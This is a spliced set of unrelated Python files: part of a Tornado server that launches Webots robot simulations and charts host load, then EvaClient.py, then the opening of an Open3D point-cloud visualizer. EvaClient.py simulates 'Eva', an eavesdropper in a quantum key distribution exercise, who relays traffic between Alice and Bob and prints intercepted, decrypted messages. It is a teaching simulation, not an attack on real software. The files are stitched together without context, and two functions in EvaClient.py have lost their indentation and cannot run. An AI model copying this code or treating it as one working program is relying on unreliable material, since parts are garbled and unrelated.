            # track simulation state from Webots stdout; '.' is an activity ping
            for line in iter(client.webots_process.stdout.readline, b''):
                line = line.rstrip()
                if line == 'pause':
                    client.idle = True
                elif line == 'real-time' or line == 'step':
                    client.idle = False
                elif line == '.':
                    client.client_websocket.write_message('.')
            client.on_exit()
        if self.setup_project():
            self.on_webots_quit = on_webots_quit
            threading.Thread(target=runWebotsInThread, args=(self,)).start()
        else:
            on_webots_quit()
    def on_exit(self):
        """Callback issued when Webots quits."""
        if self.webots_process:
            logging.warning('[%d] Webots [%d] exited' % (id(self), self.webots_process.pid))
            self.webots_process.wait()
            self.webots_process = None
        self.on_webots_quit()
    def kill_webots(self):
        """Force the termination of Webots."""
        if self.webots_process:
            logging.warning('[%d] Webots [%d] was killed' % (id(self), self.webots_process.pid))
            if sys.platform == 'darwin':
                self.webots_process.kill()
            else:
                self.webots_process.terminate()
                try:
                    self.webots_process.wait(5) # set a timeout (seconds) to avoid blocking the whole script
                except subprocess.TimeoutExpired:
                    logging.warning('[%d] ERROR killing Webots [%d]' % (id(self), self.webots_process.pid))
                    self.webots_process.kill()
            self.webots_process = None
class ClientWebSocketHandler(tornado.websocket.WebSocketHandler):
    """This class handles websocket connections."""
    # set of all currently connected Client instances (class-wide registry)
    clients = set()
    def check_origin(self, origin):
        """Allow to run the server on the same computer as the client."""
        return True
    @classmethod
    def find_client_from_websocket(self, client_websocket):
        """Return client associated with a websocket."""
        for client in self.clients:
            if client.client_websocket == client_websocket:
                return client
        return None
    @classmethod
    def next_available_port(self):
        """Return a port number available for a new Webots WebSocket server.

        Scans config['port']+1 .. config['port']+maxConnections, skipping
        ports already assigned to a client, and returns 0 when exhausted.
        """
        port = config['port'] + 1
        while True:
            if port > config['port'] + config['maxConnections']:
                logging.error("Too many open connections (>" + str(config['maxConnections']) + ")")
                return 0
            found = False
            for client in self.clients:
                if port == client.streaming_server_port:
                    found = True
                    break
            if found:
                port += 1
                continue
            # try to create a server to make sure that port is available
            testSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            try:
                testSocket.bind(('0.0.0.0', port))
                found = True
            except socket.error as e:
                found = False
                if e.errno == errno.EADDRINUSE:
                    logging.info('Port ' + str(port) + ' is already in use.')
                else: # something else raised the socket.error exception
                    logging.info('Port ' + str(port) + ': ' + e)
            finally:
                testSocket.close()
            if found:
                return port
            port += 1
    def open(self):
        """Open a new connection for an incoming client."""
        self.set_nodelay(True)
        logging.info(self.request.host)
        client = Client(client_websocket=self)
        ClientWebSocketHandler.clients.add(client)
        logging.info('[%d] New client' % (id(client),))
    def on_close(self):
        """Close connection after client leaves."""
        client = ClientWebSocketHandler.find_client_from_websocket(self)
        if client:
            logging.info('[%d] Client disconnected' % (id(client),))
            client.kill_webots()
            if client in ClientWebSocketHandler.clients:
                ClientWebSocketHandler.clients.remove(client)
            del client
    def on_message(self, message):
        """Receive message from client.

        Handles three JSON message kinds: 'init' (setup from a ZIP/host
        project), 'reset controller' (restore one controller file), and
        'start' (checkout a GitHub folder and run a simulation in it).
        """
        client = ClientWebSocketHandler.find_client_from_websocket(self)
        if client:
            data = json.loads(message)
            if 'init' in data:
                # setup client
                client.streaming_server_port = ClientWebSocketHandler.next_available_port()
                logging.info('data[init]=%s' % data['init'])
                client.host = data['init'][0]
                client.app = data['init'][1]
                client.world = data['init'][2]
                client.user1Id = data['init'][3]
                client.user1Name = data['init'][4]
                client.user1Authentication = data['init'][5]
                client.user2Id = data['init'][6]
                client.user2Name = data['init'][7]
                client.customData = data['init'][8]
                client.idle = True
                # Check that client.host is allowed
                # strip the scheme ('https://' or 'http://') and any port suffix
                host = client.host[8:] if client.host.startswith('https://') else client.host[7:]
                n = host.find(':')
                if n > 0:
                    host = host[:n]
                keyFilename = os.path.join(config['keyDir'], host)
                if os.path.isfile(keyFilename):
                    try:
                        keyFile = open(keyFilename, "r")
                    except IOError:
                        logging.error("Unknown host: " + host + " from " + self.request.remote_ip)
                        client.client_websocket.close()
                        return
                    client.key = keyFile.readline().rstrip(os.linesep)
                    keyFile.close()
                else:
                    logging.warning("No key for: " + host)
                logging.info('[%d] Setup client %s %s '
                             '(remote ip: %s, streaming_server_port: %s)'
                             % (id(client),
                                client.app,
                                client.world,
                                self.request.remote_ip,
                                client.streaming_server_port))
                self.start_client()
            elif "reset controller" in data:
                # restore the pristine controller file from the projects directory
                relativeFilename = '/controllers/' + data['reset controller']
                shutil.copyfile(config['projectsDir'] + '/' + client.app + relativeFilename,
                                client.project_instance_path + '/' + relativeFilename)
                self.write_message('reset controller: ' + data['reset controller'])
                logging.info('[%d] Reset file %s '
                             '(remote ip: %s, streaming_server_port: %s)'
                             % (id(client),
                                data['reset controller'],
                                self.request.remote_ip,
                                client.streaming_server_port))
            elif 'start' in data: # checkout a github folder and run a simulation in there
                client.streaming_server_port = ClientWebSocketHandler.next_available_port()
                client.url = data['start']['url']
                logging.info('Starting simulation from ' + client.url)
                self.start_client()
    def on_webots_quit(self):
        """Cleanup websocket connection."""
        client = ClientWebSocketHandler.find_client_from_websocket(self)
        if client and client.client_websocket:
            client.client_websocket.close()
    def start_client(self):
        """Start Webots."""
        # let 10 seconds to start Webots
        self.last_supervisor_activity = None
        client = ClientWebSocketHandler.find_client_from_websocket(self)
        client.start_webots(self.on_webots_quit)
class LoadHandler(tornado.web.RequestHandler):
    """Handle load requests."""

    def get(self):
        """Reply with the server's most recent load measurement as plain text."""
        global current_load
        load_text = str(current_load)
        self.write(load_text)
class MonitorHandler(tornado.web.RequestHandler):
    """Display the monitor web page."""
    global config
    global snapshots
    global nvidia
    def get(self):
        """Write the web page content.

        Renders static host information (OS, CPU, GPU, RAM) plus a JS graph
        of the collected snapshots, with platform-specific probing for
        Linux (/proc, distro), Windows (wmi) and macOS (sysctl).
        """
        global cpu_load
        global gpu_load_compute
        global gpu_load_memory
        memory = psutil.virtual_memory()
        swap = psutil.swap_memory()
        if nvidia:
            nvmlHandle = nvmlDeviceGetHandleByIndex(0)
            gpu = nvmlDeviceGetName(nvmlHandle).decode('utf-8')
            gpu_memory = nvmlDeviceGetMemoryInfo(nvmlHandle)
            # 1024 * 1048576 converts bytes to gigabytes
            gpu_ram = round(gpu_memory.total / (1024 * 1048576), 2)
            gpu += " - " + str(gpu_ram) + "GB"
        else:
            gpu = "Not recognized"
        ram = str(int(round(float(memory.total) / (1024 * 1048576)))) + "GB"
        ram += " (swap: " + str(int(round(float(swap.total) / (1024 * 1048576)))) + "GB)"
        real_cores = psutil.cpu_count(False)
        cores_ratio = int(psutil.cpu_count(True) / real_cores)
        cores = " (" + str(cores_ratio) + "x " + str(real_cores) + " cores)"
        if sys.platform.startswith('linux'):
            distribution = distro.linux_distribution()
            os_name = 'Linux ' + distribution[0] + " " + distribution[1] + " " + distribution[2]
            command = "cat /proc/cpuinfo"
            all_info = subprocess.check_output(command, shell=True).decode('utf-8').strip()
            for line in all_info.split("\n"):
                if "model name" in line:
                    cpu = re.sub(".*model name.*:", "", line, 1)
                    break
        elif sys.platform == 'win32':
            computer = wmi.WMI()
            os_info = computer.Win32_OperatingSystem()[0]
            cpu = computer.Win32_Processor()[0].Name
            os_name = os_info.Name.split('|')[0] + ", version " + os_info.Version
        elif sys.platform == 'darwin':
            os_name = 'macOS ' + platform.mac_ver()[0]
            os.environ['PATH'] = os.environ['PATH'] + os.pathsep + '/usr/sbin'
            command = 'sysctl -n machdep.cpu.brand_string'
            cpu = subprocess.check_output(command).strip()
        else: # unknown platform
            os_name = 'Unknown'
            cpu = 'Unknown'
        self.write("<!DOCTYPE html>\n")
        self.write("<html><head><meta charset='utf-8'/><title>Webots simulation server</title>")
        self.write("<link rel='stylesheet' type='text/css' href='css/monitor.css'></head>\n")
        self.write("<body><h1>Webots simulation server: " + socket.getfqdn() + "</h1>")
        self.write("<h2>Host: " + os_name + "</h2>\n")
        self.write("<p><b>CPU load: %g%%</b><br>\n" % cpu_load)
        self.write(cpu + cores + "</p>\n")
        self.write("<p><b>GPU load compute: %g%% &mdash; load memory: %g%%</b><br>\n" %
                   (gpu_load_compute, gpu_load_memory))
        self.write(gpu + "</p>\n")
        self.write("<p><b>RAM:</b><br>" + ram + "</p>\n")
        self.write("<canvas id='graph' height='400' width='1024'></canvas>\n")
        self.write("<script src='https://www.cyberbotics.com/harry-plotter/0.9f/harry.min.js'></script>\n")
        self.write("<script>\n")
        self.write("window.onload = function() {\n")
        def appendData(label):
            # serialize one snapshot metric as a harry-plotter dataset literal
            global snapshots
            d = "{title:'" + label + "',values:["
            for s in snapshots:
                d += str(s.data[label]) + ','
            return d[:-1] + "]},"
        datas = ''
        datas += appendData('Webots running')
        datas += appendData('Webots idle')
        datas += appendData('CPU load')
        datas += appendData('CPU memory')
        datas += appendData('GPU load compute')
        datas += appendData('GPU load memory')
        datas += appendData('GPU memory')
        datas += appendData('Swap')
        datas += appendData('Disk')
        datas += appendData('Network sent')
        datas += appendData('Network received')
        datas = datas[:-1] # remove the last coma
        self.write("  plotter({\n")
        self.write("    canvas: 'graph',\n")
        self.write("    datas:[ " + datas + "],\n")
        self.write("""
            labels:{
             ypos:"left",
             x:100,
             y:[50,100],
             marks:2
            },
            fill:"none",
            opacity:0.5,
            linewidth:3,
            background:"#fff",
            autoscale:"top",
            grid:{
             x:[0,100]
            },
            mouseover:{
             radius:4,
             linewidth:2,
             bullet:"#444",
             shadowbox:"1,1,0,#000",
             axis:"x"
            }
            });""")
        self.write("}\n")
        self.write("</script>\n")
        self.write("</body></html>")
def update_snapshot():
    """Compute a monitoring snapshot.

    Samples CPU/GPU/memory/disk/network metrics, counts running vs idle
    Webots instances, appends the snapshot to the rolling `snapshots` list,
    updates the global `current_load`, and reschedules itself on the tornado
    IO loop every SNAPSHOT_REFRESH seconds.
    """
    global current_load
    global network_sent
    global network_received
    global cpu_load
    global gpu_load_compute
    global gpu_load_memory
    memory = psutil.virtual_memory()
    swap = psutil.swap_memory()
    disk = psutil.disk_usage('/')
    n = psutil.net_io_counters()
    new_network_sent = n.bytes_sent
    new_network_received = n.bytes_recv
    # rates derived from the delta of the cumulative counters since last call
    network_sent_rate = float(new_network_sent - network_sent) / (SNAPSHOT_REFRESH * 1000000) # expressed in MB/s
    network_received_rate = float(new_network_received - network_received) / (SNAPSHOT_REFRESH * 1000000) # MB/s
    network_sent = new_network_sent
    network_received = new_network_received
    global nvidia
    if nvidia:
        nvmlHandle = nvmlDeviceGetHandleByIndex(0)
        gpu_memory = nvmlDeviceGetMemoryInfo(nvmlHandle)
        gpu_ram_usage = round(100 * float(gpu_memory.used) / float(gpu_memory.total), 1)
    else: # not supported
        nvmlHandle = 0
        gpu_ram_usage = 0
    cpu_load = psutil.cpu_percent()
    try:
        gpu_load = nvmlDeviceGetUtilizationRates(nvmlHandle)
        gpu_load_compute = gpu_load.gpu
        gpu_load_memory = gpu_load.memory
    except NVMLError: # not supported on some hardware
        gpu_load_compute = 0
        gpu_load_memory = 0
    # tally client simulation states (idle == paused)
    webots_idle = 0
    webots_running = 0
    for client in ClientWebSocketHandler.clients:
        if client.idle:
            webots_idle = webots_idle + 1
        else:
            webots_running = webots_running + 1
    snapshot = Snapshot()
    snapshot.data['Timestamp'] = int(time.time())
    snapshot.data['Webots running'] = webots_running
    snapshot.data['Webots idle'] = webots_idle
    snapshot.data['CPU load'] = cpu_load
    snapshot.data['CPU memory'] = memory.percent
    snapshot.data['GPU load compute'] = gpu_load_compute
    snapshot.data['GPU load memory'] = gpu_load_memory
    snapshot.data['GPU memory'] = gpu_ram_usage
    snapshot.data['Swap'] = swap.percent
    snapshot.data['Disk'] = disk.percent
    snapshot.data['Network sent'] = network_sent_rate
    snapshot.data['Network received'] = network_received_rate
    snapshot.write()
    # current_load is the maximum of all metrics except the timestamp
    current_load = 0
    for key, value in snapshot.data.items():
        if key == 'Timestamp':
            continue
        if value > current_load:
            current_load = value
    snapshots.append(snapshot)
    if len(snapshots) > 600: # display data for the last 10 minutes
        del snapshots[0]
    tornado.ioloop.IOLoop.current().add_timeout(int(time.time()) + SNAPSHOT_REFRESH, update_snapshot)
def main():
    """Start the simulation server.

    Reads the already-loaded global ``config`` dict, fills in defaults,
    configures logging and the monitor CSV, optionally starts the Janus
    multimedia server, then runs the Tornado HTTP/WebSocket server until
    the IO loop stops.

    Side effects: sets the module globals ``config``, ``snapshots``,
    ``nvidia``, ``network_sent``, ``network_received`` and ``monitorFile``.
    """
    # the following config variables read from the config.json file
    # are described here:
    #
    # port: local port on which the server is listening (launching webots instances).
    # portRewrite: true if local ports are computed from 443 https/wss URLs (apache rewrite rule).
    # sslKey: private key for a SSL enabled server.
    # sslCertificate: certificate for a SSL enabled server.
    # projectsDir: directory in which projects are located.
    # keyDir: directory where the host keys needed for validation are stored.
    # logDir: directory where the log files are written.
    # monitorLogEnabled: specify if the monitor data have to be stored in a file.
    # maxConnections: maximum number of simultaneous Webots instances.
    # debug: debug mode (output to stdout).
    #
    global config
    global snapshots
    global nvidia
    global network_sent
    global network_received
    global monitorFile
    # Seed the byte counters so the first snapshot can compute a transfer rate.
    n = psutil.net_io_counters()
    network_sent = n.bytes_sent
    network_received = n.bytes_recv
    snapshots = []
    # Locate the Webots executable relative to WEBOTS_HOME (platform dependent).
    config['WEBOTS_HOME'] = os.getenv('WEBOTS_HOME', '../../..').replace('\\', '/')
    config['webots'] = config['WEBOTS_HOME']
    if sys.platform == 'darwin':
        config['webots'] += '/Contents/MacOS/webots'
    elif sys.platform == 'win32':
        config['webots'] += '/msys64/mingw64/bin/webots.exe'
    else:  # linux
        config['webots'] += '/webots'
    # Fill in defaults for any missing configuration keys.
    if 'projectsDir' not in config:
        config['projectsDir'] = config['WEBOTS_HOME'] + '/projects/samples/robotbenchmark'
    else:
        config['projectsDir'] = expand_path(config['projectsDir'])
    if 'keyDir' not in config:
        config['keyDir'] = 'key'
    else:
        config['keyDir'] = expand_path(config['keyDir'])
    if 'port' not in config:
        config['port'] = 2000
    if 'maxConnections' not in config:
        config['maxConnections'] = 100
    if 'debug' not in config:
        config['debug'] = False
    os.environ['WEBOTS_FIREJAIL_CONTROLLERS'] = '1'
    config['instancesPath'] = tempfile.gettempdir().replace('\\', '/') + '/webots/instances/'
    # Create a fresh instances directory (remove leftovers from a previous run).
    if os.path.exists(config['instancesPath']):
        shutil.rmtree(config['instancesPath'])
    mkdir_p(config['instancesPath'])
    # Logging system: either stdout (debug) or a rotating file.
    log_formatter = logging.Formatter('%(asctime)-15s [%(levelname)-7s] %(message)s')
    root_logger = logging.getLogger()
    root_logger.setLevel(logging.DEBUG)
    config['logDir'] = 'log' if 'logDir' not in config else expand_path(config['logDir'])
    simulationLogDir = os.path.join(config['logDir'], 'simulation')
    logFile = os.path.join(simulationLogDir, 'output.log')
    try:
        if not os.path.exists(simulationLogDir):
            os.makedirs(simulationLogDir)
        file_handler = logging.StreamHandler(sys.stdout) if config['debug'] else \
            logging.handlers.RotatingFileHandler(logFile, maxBytes=500000, backupCount=10)
        file_handler.setFormatter(log_formatter)
        file_handler.setLevel(logging.INFO)
        root_logger.addHandler(file_handler)
    except (OSError, IOError) as e:
        sys.exit("Log file '" + logFile + "' cannot be created: " + str(e))
    # disable tornado.access INFO logs
    tornado_access_log = logging.getLogger('tornado.access')
    tornado_access_log.setLevel(logging.WARNING)
    # Create monitor.csv used by Snapshot if needed.
    if 'monitorLogEnabled' not in config:
        config['monitorLogEnabled'] = True
    if config['monitorLogEnabled']:
        monitorFile = os.path.join(simulationLogDir, 'monitor.csv')
        try:
            if not os.path.exists(simulationLogDir):
                os.makedirs(simulationLogDir)
            # 'with' guarantees the handle is closed even if write() raises;
            # the original open()/close() pair (bound to the builtin name
            # 'file') could leak the handle on a failed write.
            with open(monitorFile, 'w') as monitor:
                monitor.write("Timestamp, Webots running, Webots idle, CPU load, CPU memory, "
                              "GPU load compute, GPU load memory, GPU memory, Swap, Disk, Network sent, Network received\n")
        except (OSError, IOError) as e:
            logging.error("Log file '" + monitorFile + "' cannot be created: " + str(e))
    # Startup janus server if needed.
    if 'multimediaServer' in config:
        subprocess.Popen(["/opt/janus/bin/janus"])
    # Startup the server (lazy %-style args: only formatted if the record is emitted).
    logging.info("Running simulation server on port %d", config['port'])
    handlers = []
    handlers.append((r'/monitor', MonitorHandler))
    handlers.append((r'/client', ClientWebSocketHandler))
    handlers.append((r'/load', LoadHandler))
    handlers.append((r'/(.*)', tornado.web.StaticFileHandler,
                     {'path': config['WEBOTS_HOME'] + '/resources/web/server/www',
                      'default_filename': 'index.html'}))
    application = tornado.web.Application(handlers)
    if 'sslCertificate' in config and 'sslKey' in config:
        config['ssl'] = True
        ssl_certificate = os.path.abspath(expand_path(config['sslCertificate']))
        ssl_key = os.path.abspath(expand_path(config['sslKey']))
        ssl_options = {"certfile": ssl_certificate, "keyfile": ssl_key}
        http_server = tornado.httpserver.HTTPServer(application, ssl_options=ssl_options)
    else:
        config['ssl'] = False
        http_server = tornado.httpserver.HTTPServer(application)
    if 'portRewrite' not in config:
        config['portRewrite'] = False
    http_server.listen(config['port'])
    message = "Simulation server running on port %d (" % config['port']
    if not config['ssl']:
        message += 'no '
    message += 'SSL)'
    print(message)
    sys.stdout.flush()
    # Detect NVIDIA GPU monitoring support (NVML); fall back gracefully.
    try:
        nvmlInit()
        nvidia = True
    except NVMLError:
        nvidia = False
    update_snapshot()
    try:
        tornado.ioloop.IOLoop.current().start()
    except Exception:
        logging.info(traceback.format_exc())
    # (The original iterated ClientWebSocketHandler.clients and `del client`-ed
    # the loop variable, which only unbound a local name and released nothing;
    # that dead loop has been removed.)
    if nvidia:
        nvmlShutdown()
# --- module-level startup -------------------------------------------------
if sys.platform == 'win32' and sys.version_info >= (3, 8):
    # Tornado requires the selector event loop policy on Windows + Python 3.8+.
    asyncio.set_event_loop_policy(asyncio.WindowsSelectorEventLoopPolicy())
# Fix: 'linux2' was the Python 2 value of sys.platform; on Python 3 it is
# 'linux', so the original comparison never matched and this cleanup was
# silently skipped on Linux.
if sys.platform.startswith('linux'):
    # kill all the existing instances of Webots to avoid conflicts with web socket port
    os.system("killall -q webots-bin")
    # specify the display to ensure Webots can be executed even if this script is started remotely from a ssh session
    if "DISPLAY" not in os.environ:
        os.environ["DISPLAY"] = ":0"
# ensure we are in the script directory
os.chdir(os.path.dirname(os.path.realpath(__file__)))
argc = len(sys.argv)
if argc == 1:
    config_json = 'config/simulation/default.json'  # default config location
elif argc == 2:
    config_json = sys.argv[1]  # user-supplied config path
else:
    sys.exit('Too many arguments.')
with open(config_json) as config_file:
    config = json.load(config_file)
if __name__ == '__main__':
    main()
|
EvaClient.py
|
# Copyright (c) 2016 Gabriel Oliveri (<gabrieloandco@gmail.com>)
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import socket
import pickle
import BobClass
import threading
import time
import select
import Queue
from ForLoopEncrypt import *
from XorEncrypt import *
# Lock serializing the key-update protocol (acquired/released in UpdateKey).
rLock = threading.Lock()
# Shutdown flag for the module-level forwarding loop at the bottom of the file.
breaking = False
# Current shared key as an integer; read by DecryptMessage, written by UpdateKey.
key = 0
def EvaTunnel(blocks,connecttoeva, connecttoalice,start_updating,stop_updating,stop_receivingeva,stop_receivingbob,breakevent):
    """Man-in-the-middle relay thread (Python 2).

    Listens on port 5001, accepts two connections (first "Eva", then "Bob"),
    spawns one ReceiveFrom reader thread per peer and forwards every payload
    from one peer to the other until breakevent is set.

    Args:
        blocks: message-size factor used to compute recv() buffer sizes.
        connecttoeva/connecttoalice: events signalling the main script when
            it may connect each endpoint.
        start_updating/stop_updating/stop_receiving*: key-update handshake
            events shared with ReceiveFrom/UpdateKey.
        breakevent: set by any reader on disconnect; terminates the loop.
    """
    breaking = False  # local loop flag (distinct from the module-level `breaking`)
    host = '192.168.0.18'
    port = 5001
    s = socket.socket()
    s.bind((host,port))
    s.listen(2)
    print "Tunneling Started."
    connecttoeva.set()  # tell the main script it may now connect as "Eva"
    ceva, addreva = s.accept()
    print "Eva address is:" + str(addreva)
    cbob, addrbob = s.accept()
    connecttoalice.set()  # both peers accepted; main script may connect to Alice
    print "Bob address is:" + str(addrbob)
    receivedfromeva = threading.Event()
    receivedfrombob = threading.Event()
    qdatabob = Queue.Queue()
    qdataeva = Queue.Queue()
    # One reader thread per peer; each puts payloads on its queue and sets
    # its "received" event so this loop can forward them.
    RFET = threading.Thread(target=ReceiveFrom, args = (blocks,ceva,receivedfromeva,start_updating,stop_receivingeva,stop_updating,qdataeva,"Eva",breakevent))
    RFBT = threading.Thread(target=ReceiveFrom, args = (blocks,cbob,receivedfrombob,start_updating,stop_receivingbob,stop_updating,qdatabob,"Bob",breakevent))
    RFET.start()
    RFBT.start()
    # Busy-polling forward loop: Eva -> Bob and Bob -> Eva.
    while not breaking:
        if receivedfromeva.is_set():
            dataeva = qdataeva.get()
            cbob.send(dataeva)
            print "Sent to Bob" + dataeva
            receivedfromeva.clear()
        if receivedfrombob.is_set():
            databob = qdatabob.get()
            ceva.send(databob)
            print "Sent to Eva" + databob
            receivedfrombob.clear()
        if breakevent.is_set():
            breaking = True
    # Orderly shutdown: join readers, then close both peers and the listener.
    RFET.join()
    RFBT.join()
    ceva.close()
    cbob.close()
    s.close()
def ReceiveFrom(blocks,socket,receivedfrom,start_updating,stop_receivingfrom,stop_updating,qdatafrom,person,breakevent,block=False):
    """Reader thread: receive payloads from one peer and queue them (Python 2).

    Each received chunk is queued on qdatafrom and `receivedfrom` is set so
    the forwarding loop relays it.  The magic token "R3c1V3!" switches the
    system into key-update mode.  An empty recv() (peer closed) sets
    breakevent and ends the loop.

    NOTE(review): the parameter `socket` shadows the `socket` module inside
    this function.  Also, an empty (disconnect) payload is queued and printed
    before the disconnect check — presumably harmless, but confirm the
    forwarding side tolerates sending b''.
    """
    breaking = False
    while not breaking:
        # Buffer size scales with the pickled message size for `blocks` blocks.
        datafrom = socket.recv(324*(1+blocks)/2)
        qdatafrom.put(datafrom)
        print "Received from: " + person + datafrom
        receivedfrom.set()
        if not datafrom:  # empty payload => peer disconnected
            breaking = True
            breakevent.set()
        if datafrom == "R3c1V3!":
            # Key-update handshake token: stop decrypting on this channel
            # and wake the UpdateKey thread.
            stop_receivingfrom.set()
            stop_updating.clear()
            start_updating.set()
        if not stop_receivingfrom.is_set():
            # DecryptMessage prints the decryption itself and returns None.
            print DecryptMessage(datafrom,start_updating)
        if block:
            # Optional back-pressure: wait until the key update finishes.
            stop_updating.wait()
def DecryptMessage(data,start_updating):
global key
if not start_updating.is_set():
try:
print "key: " + str(key)
print "message: " + ForLoopDecrypt(data,key)[0:20]
except:
print "Couldn't Decrypt"
else:
pass
def UpdateKey(blocks,socketalice,socketeva,stop_receivingbob,stop_receivingeva,stop_receivingfromtunnel,stop_receivingfromalice,stop_updating,start_updating,start_clock,breakingevent):
global key
breaking = False
def uk():
global key
try:
start_updating.wait()
stop_receivingfromalice.wait()
stop_receivingbob.wait()
stop_receivingeva.wait()
stop_receivingfromtunnel.wait()
stop_updating.clear()
rLock.acquire()
print "Updating"
ready = select.select([socketalice],[],[],3)
if ready[0]:
AliceMbits = socketalice.recv(324*(1+blocks)/2)
print "Received Alice's bases"
print "bases: " + AliceMbits
AliceM= pickle.loads(AliceMbits)
BobM = BobClass.Bob(blocks)
ResultM= AliceM.Measure(BobM)
ResultMbits = pickle.dumps(ResultM)
socketeva.send(ResultMbits)
print "Sent State to Tunnel"
consbits = socketeva.recv(47*(1+blocks)/2)
print "Received Coincidences from Eva"
socketalice.send(consbits)
print "Sent Coincidences To Alice"
cons = pickle.loads(consbits)
newkey = BobM.KeyBob(ResultM,cons)
key= int("0b"+"".join(str(i) for i in newkey),2)
done = socketalice.recv(1024)
socketeva.send(done)
done = socketeva.recv(1024)
socketalice.send(done)
print done
print "Key Updated; new key: " + bin(key)
stop_receivingeva.clear()
stop_receivingbob.clear()
stop_updating.set()
start_clock.set()
start_updating.clear()
rLock.release()
return key
except:
print "Update Failed"
stop_receivingbob.clear()
stop_receivingeva.clear()
stop_updating.set()
start_clock.set()
start_updating.clear()
return 1
while not breaking:
uk()
if breakingevent.is_set():
breaking = True
socket.close()
# Main Bob-side script (Python 2): connects to the tunnel ("Eva" side, port
# 5001) and to Alice (port 5000), starts reader and key-update threads, and
# forwards traffic between both peers until a disconnect sets breakevent.
if True:
    blocks=int(raw_input('give me blocks: '))  # message-size factor for recv buffers
    delay = 10
    # Handshake and state events shared across all threads.
    connecttoeva = threading.Event()
    connecttoalice = threading.Event()
    start_updating = threading.Event()
    stop_receivingeva = threading.Event()
    stop_receivingbob = threading.Event()
    stop_updating=threading.Event()
    start_clock = threading.Event()
    breakevent = threading.Event()
    Tunnel = threading.Thread(target=EvaTunnel, args=(blocks,connecttoeva, connecttoalice,start_updating,stop_updating,stop_receivingeva,stop_receivingbob,breakevent))
    Tunnel.start()
    connecttoeva.wait()  # wait until the tunnel is listening
    hostEva='192.168.0.18'
    portEva = 5001
    seva = socket.socket()
    seva.connect((hostEva,portEva))
    connecttoalice.wait()  # tunnel has both peers; now reach Alice directly
    hostAlice='192.168.0.18'
    portAlice = 5000
    salice = socket.socket()
    salice.connect((hostAlice,portAlice))
    receivedfromtunnel = threading.Event()
    receivedfromalice = threading.Event()
    stop_receivingfromtunnel = threading.Event()
    stop_receivingfromalice = threading.Event()
    qdatatunnel = Queue.Queue()
    qdataalice = Queue.Queue()
    # Blocking readers (block=True): they pause on stop_updating during key updates.
    RFTT = threading.Thread(target=ReceiveFrom, args = (blocks,seva,receivedfromtunnel,start_updating,stop_receivingfromtunnel,stop_updating,qdatatunnel,"Tunnel",breakevent,True))
    RFAT = threading.Thread(target=ReceiveFrom, args = (blocks,salice,receivedfromalice,start_updating,stop_receivingfromalice,stop_updating,qdataalice,"Alice",breakevent, True))
    RFTT.start()
    RFAT.start()
    uT = threading.Thread(target=UpdateKey, args=(blocks,salice,seva,stop_receivingbob,stop_receivingeva,stop_receivingfromtunnel,stop_receivingfromalice,stop_updating,start_updating,start_clock,breakevent))
    uT.start()
    stop_updating.set()
    start_clock.set()
    # Forwarding loop; `breaking` is the module-level flag initialised to
    # False at the top of the file.
    # NOTE(review): the event/queue pairing below looks crossed — the
    # "received from Alice" event gates the *tunnel* queue and vice versa.
    # Confirm against the ReceiveFrom wiring before relying on it.
    while not breaking:
        if receivedfromalice.is_set():
            datatunnel = qdatatunnel.get()
            seva.send(datatunnel)
            print "Sent to Tunnel"
            receivedfromalice.clear()
        if receivedfromtunnel.is_set():
            dataalice = qdataalice.get()
            salice.send(dataalice)
            print "Sent to Alice"
            receivedfromtunnel.clear()
        if breakevent.is_set():
            breaking = True
    # Orderly shutdown.
    uT.join()
    RFTT.join()
    RFAT.join()
    salice.close()
    seva.close()
|
visualizer.py
|
import math
import numpy as np
import threading
import open3d as o3d
from open3d.visualization import gui
from open3d.visualization import rendering
from collections import deque
from .boundingbox import *
from .colormap import *
from .labellut import *
import time
class Model:
    """The class that helps build visualization models based on attributes,
    data, and methods.

    A Model maps point-cloud names to (a) a rendering TPointCloud in
    ``tclouds`` and (b) the raw attribute arrays in ``_data``.  Subclasses
    implement load()/unload() for their storage strategy.
    """
    # Name prefix used to group bounding-box entries (e.g. in a UI tree).
    bounding_box_prefix = "Bounding Boxes/"

    class BoundingBoxData:
        """The class to define a bounding box that is used to describe the
        target location.
        Args:
            name: The name of the pointcloud array.
            boxes: The array of pointcloud that define the bounding box.
        """

        def __init__(self, name, boxes):
            self.name = name
            self.boxes = boxes

    def __init__(self):
        # Note: the tpointcloud cannot store the actual data arrays, because
        # the tpointcloud requires specific names for some arrays (e.g. "points",
        # "colors"). So the tpointcloud exists for rendering and initially only
        # contains the "points" array.
        self.tclouds = {} # name -> tpointcloud
        self.data_names = [] # the order data will be displayed / animated
        self.bounding_box_data = [] # [BoundingBoxData]
        self._data = {} # name -> {attr_name -> numpyarray}
        self._known_attrs = {} # name -> set(attrs)
        self._attr2minmax = {} # only access in _get_attr_minmax()
        # Canonical attribute spellings applied in create_point_cloud().
        self._attr_rename = {"label": "labels", "feat": "feature"}

    def _init_data(self, name):
        """Register *name* with an empty TPointCloud and attribute dict."""
        tcloud = o3d.t.geometry.PointCloud(o3d.core.Device("CPU:0"))
        self.tclouds[name] = tcloud
        self._data[name] = {}
        self.data_names.append(name)

    def is_loaded(self, name):
        """Check if the data is loaded."""
        if name in self._data:
            return len(self._data[name]) > 0
        else:
            # if the name isn't in the data, presumably it is loaded
            # (for instance, if this is a bounding box).
            return True

    def load(self, name, fail_if_no_space=False):
        """If data is not loaded, then load the data."""
        # NOTE(review): raising NotImplementedError would be the idiomatic
        # pure-virtual marker; assert is stripped under `python -O`.
        assert (False) # pure virtual

    def unload(self, name):
        # Pure-virtual: subclasses must override (see NOTE on load()).
        assert (False) # pure virtual

    def create_point_cloud(self, data):
